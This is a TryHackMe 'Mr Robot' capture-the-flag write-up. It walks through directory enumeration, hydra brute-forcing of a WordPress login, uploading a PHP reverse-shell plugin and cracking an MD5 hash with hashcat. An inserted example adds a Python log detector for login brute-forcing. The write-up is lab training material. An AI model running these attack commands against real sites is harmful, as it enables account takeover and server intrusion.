TryHackMe | Mr Robot CTF

0UR4N05
Jan 8, 2021

Hello guys, it’s your boy ouranos again, and today we have the Mr Robot CTF.

[ Key 1 ] :

After deploying the machine, launch a dirb attack:

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $sudo dirb http://<ip>

Then you will see an entry called robots. This file is used to tell crawlers such as Google’s bots not to index some server files.

It lists two files: a dictionary, which we’re maybe gonna use later, and the first key. Don’t forget to download it.

[ Key 2] :

Having a wordlist in the challenge is a sign of brute force. We can’t brute-force SSH because it’s closed, so we should look for a login page.

┌─[ouranos@parrot]─[~]
└──╼ $sudo dirb http://<IP>

After the dirb attack we found this:

/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/0 (Status: 301)
/video (Status: 301)
/feed (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/Image (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
/dashboard (Status: 302)

dirb found a “wp-login”, so we’re gonna try to enumerate users using wpscan:

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $sudo wpscan --url http://10.10.224.73/ --enumerate u

But no users were found, so we’re gonna use hydra to brute-force the login:

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hydra -L fsocity.dic -p password <IP> http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username"

Bingo, we got our username. Now we’re gonna try the password:

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hydra -l Elliot -P fsocity.dic <IP> http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:S=302"

And we got our password, so we’re gonna log in.
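Seen from the defender's side, the two hydra runs above leave a clear trace in the web server access log: one client sending many POSTs to the login path, answered 200 each time WordPress re-renders the form, then a single 302 once the credentials are accepted. The sketch below is an added example, not part of the original writeup; the log lines are constructed (combined log format assumed), and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Fields needed from a combined-format access log: client IP, method, path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# "/wp-login" is the path in the writeup's hydra command; wp-login.php is the stock name.
LOGIN_PATHS = {"/wp-login", "/wp-login.php"}

def find_login_bruteforce(lines, min_failures=5):
    """Return {ip: {"failures": n, "success_after_failures": bool}} for noisy clients."""
    stats = defaultdict(lambda: {"failures": 0, "success_after_failures": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path not in LOGIN_PATHS:
            continue
        s = stats[m["ip"]]
        if m["status"] == "200":        # failed login: form is shown again
            s["failures"] += 1
        elif m["status"] == "302" and s["failures"] >= min_failures:
            s["success_after_failures"] = True  # redirect after a run of failures
    return {ip: dict(s) for ip, s in stats.items() if s["failures"] >= min_failures}

def _line(ip, sec, method, path, status):
    # Helper that builds one constructed log line (not real traffic).
    return (f'{ip} - - [08/Jan/2021:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: one client guessing repeatedly, one user mistyping once.
SAMPLE = (
    [_line("203.0.113.7", i, "POST", "/wp-login/", 200) for i in range(8)]
    + [_line("203.0.113.7", 9, "POST", "/wp-login/", 302),
       _line("198.51.100.4", 20, "POST", "/wp-login/", 200),
       _line("198.51.100.4", 25, "POST", "/wp-login/", 302),
       _line("198.51.100.4", 30, "GET", "/blog", 301)]
)

if __name__ == "__main__":
    for ip, s in find_login_bruteforce(SAMPLE).items():
        print(ip, s)
```

A client flagged with success_after_failures set is the case to treat as a compromised account: reset that password and review recent plugin uploads.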

Now our goal is to get a reverse shell, and to do this we’re gonna upload a payload in the plugin section.

wordpress payload : /usr/share/webshells/php/php-reverse-shell.php

Replace the IP with yours, zip it, upload it, listen for the incoming connection, then activate it.

Let’s gooo, we got a reverse shell and our second key, but we can’t read it. We also have an MD5 password hash, so we’re gonna put it in a file and brute-force it:

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

After you get the password, log in as the robot and get the key.

This writeup covers 2 keys, maybe I’ll upgrade it later. Thank you for reading, 0UR4N05
